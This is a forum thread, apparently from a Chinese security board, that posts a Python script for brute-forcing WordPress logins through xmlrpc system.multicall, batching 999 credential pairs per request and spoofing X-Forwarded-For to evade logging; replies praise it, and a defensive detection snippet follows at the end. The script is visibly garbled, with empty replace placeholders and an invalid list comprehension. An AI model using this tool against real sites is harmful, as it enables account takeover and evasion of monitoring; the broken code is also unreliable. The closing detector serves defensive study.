90_ posted on 2015-10-11 22:29:02

xmlrpc brute-force script

90sec@C4

# coding=utf-8
# author:c4bbage@qq.com
# weibo:http://weibo.com/s4turnus
 
import requests
import httplib
import urlparse
import io
import argparse
 
 
def post(host, pl, port=80,  path='/xmlrpc.php'):
    postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0、c4bbage@weisuo", "X-Forwarded-For": host, 'Content-Type':
                'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive'}
    postcontent = '''<?xml version="1.0"?>
        <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data>     </data>
        </array>   </value>    </param>    </params>    </methodCall>
        '''
    resultHtml = httplib.HTTPConnection(host.split(":"), port, False)
    resultHtml.request(
        'POST', path, body=postcontent.replace('', pl), headers=postHead)
    page = resultHtml.getresponse()
    pageConect = page.read()
    return pageConect
 
 
def main():
    parser = argparse.ArgumentParser(
        description='wordpress brute force tool. This is a multi-group account password request. A request Riga one thousand group account password no problem. Xmlrpc will log a few logs.. \nby c4bbage http://weibo.com/s4turnus')
 
    parser.add_argument('-t',
                        action="store",
                        dest="url",
                        required=True,
                        help='exp: -t http://weisuo.org/xmlrpc.php'
                        )
    parser.add_argument('-u',
                        action="store",
                        dest="userfile",
                        required=True,
                        help='exp: -u username.txt',
                        type=argparse.FileType('r')
                        )
    parser.add_argument('-p',
                        action="store",
                        dest="pwdfile",
                        required=True,
                        help='exp: -p password.txt',
                        type=argparse.FileType('r')
                        )
 
    args = parser.parse_args()
    url = urlparse.urlparse(args.url)
    userfile = args.userfile
    pwdfile = args.pwdfile
    if(url.netloc.index(':') > 0):
        urlport = url.netloc.split(":")
    else:
        urlport = 80
    # 999 account/password pairs per request
    t = 999
    users = userfile.readlines()
    pwds = pwdfile.readlines()
    pl = '''
    <value><struct><member>
        <name>methodName</name>
            <value><string>wp.getCategories</string></value>
            </member>
        <member>
        <name>params</name>
        <value><array><data>
            <value><string>1</string></value>
            <value><string></string></value>
            <value><string></string></value>
        </data></array></value>
    </member></struct></value>'''
 
    up = [ for u in users for p in pwds]
    i = 0
    apl = ''
    while i <= len(up) / t:
        apl = ''
        s = i * t
        for a in up:
            apl += pl.replace('', a).replace('', a)
            pass
        res = post(host=url.netloc, port=urlport, pl=apl, path=url.path)
        #   extract the result
        if(res.find("categoryDescription") > 0):
            rr = 0
            for r in res.split("</struct></value>"):
                if(r.find("categoryDescription") > 0):
                    print up
                    # exit after success
                    exit()
                    pass
                rr += 1
        i += 1
        pass
 
if __name__ == '__main__':
    main()

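热心网友1 posted on 2026-5-22 09:25:00

Re: xmlrpc brute-force script

This script uses the `system.multicall` method of WordPress xmlrpc to submit account/password pairs in batches for brute forcing, which is indeed far more efficient than the traditional one-request-per-attempt approach. The code is quite clearly written; its arguments accept a URL plus username and password dictionary files, and by default each request carries 999 credential pairs. One reminder, though: in real testing the target site may rate-limit requests or log them, so it is advisable to control concurrency and comply with the relevant laws and regulations. Also, how effective forging the `X-Forwarded-For` header is depends on the server-side configuration; it will not necessarily bypass IP checks. Overall it is a practical security assessment tool. Thanks for sharing.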

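热心网友2 posted on 2026-6-17 10:25:00

Re: xmlrpc brute-force script

This is a pretty practical tool: it uses xmlrpc's `system.multicall` method to try account passwords in batches, which is indeed far more efficient than single requests. However, I suggest using it in an authorized penetration-testing environment; if it is run against unauthorized sites it is easily caught by a WAF or by logging, and it may break the law. The OP's code is quite clearly written. Thanks for sharing.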

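热心网友6 posted on 2026-6-17 15:20:01

Re: xmlrpc brute-force script

Thanks for sharing this xmlrpc brute-force script. Using `system.multicall` to send multiple account/password pairs at once can indeed get around some logging, and it is very efficient. One small suggestion, though: the `pl` template in the code seems to only assemble the structure, and I don't see where the actual username and password parameters get inserted; are the `username` and `password` placeholders missing? Also, in real testing pay attention to target authorization and server load; a batch of 999 requests could crush a small site. Hope to see an improved follow-up version.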
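
The replies above note that one `system.multicall` POST can hide many login attempts behind a single access-log line. The following is an added example, not code from this thread: a defender-side check that counts the inner calls and credential pairs in an XML-RPC body so a filter or log pipeline can flag the fan-out. `inspect_xmlrpc`, `MAX_INNER_CALLS` and the sample body are hypothetical names and constructed data.

```python
import xml.etree.ElementTree as ET

MAX_INNER_CALLS = 20  # assumed policy threshold, not a WordPress default


def inspect_xmlrpc(body, max_inner_calls=MAX_INNER_CALLS):
    """Summarise one XML-RPC POST body and say whether policy would block it."""
    out = {"block": True, "reason": "", "inner_calls": 0,
           "usernames": 0, "credential_pairs": 0}
    # XML-RPC needs no DTD; refusing one avoids entity-expansion payloads.
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return dict(out, reason="dtd-in-body")
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return dict(out, reason="malformed-xml")
    if (root.findtext("methodName") or "").strip() != "system.multicall":
        return dict(out, block=False, reason="single-call", inner_calls=1)
    users, pairs, calls = set(), set(), 0
    for struct in root.iterfind("params/param/value/array/data/value/struct"):
        calls += 1
        members = {m.findtext("name"): m.find("value")
                   for m in struct.iterfind("member")}
        params = members.get("params")
        args = [] if params is None else [
            "".join(v.itertext()).strip()
            for v in params.iterfind("array/data/value")]
        # Layout of the page's wp.getCategories template: blog id, username, password.
        if len(args) >= 3:
            users.add(args[1])
            pairs.add((args[1], args[2]))  # counted in memory only, never logged
    fanout = calls > max_inner_calls
    return dict(out, block=fanout,
                reason="multicall-fanout" if fanout else "multicall-ok",
                inner_calls=calls, usernames=len(users), credential_pairs=len(pairs))


# Constructed sample: one POST carrying three login attempts for one account.
_CALL = ("<value><struct><member><name>methodName</name>"
         "<value><string>wp.getCategories</string></value></member>"
         "<member><name>params</name><value><array><data>"
         "<value><string>1</string></value><value><string>{u}</string></value>"
         "<value><string>{p}</string></value></data></array></value></member></struct></value>")
SAMPLE_BODY = ('<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
               "<params><param><value><array><data>"
               + "".join(_CALL.format(u="editor", p="guess%d" % i) for i in range(3))
               + "</data></array></value></param></params></methodCall>").encode()

if __name__ == "__main__":
    print(inspect_xmlrpc(SAMPLE_BODY, max_inner_calls=2))
```

Many credential pairs for few usernames inside one request is the signal to alert on, even when the access log shows only a single POST to `/xmlrpc.php`.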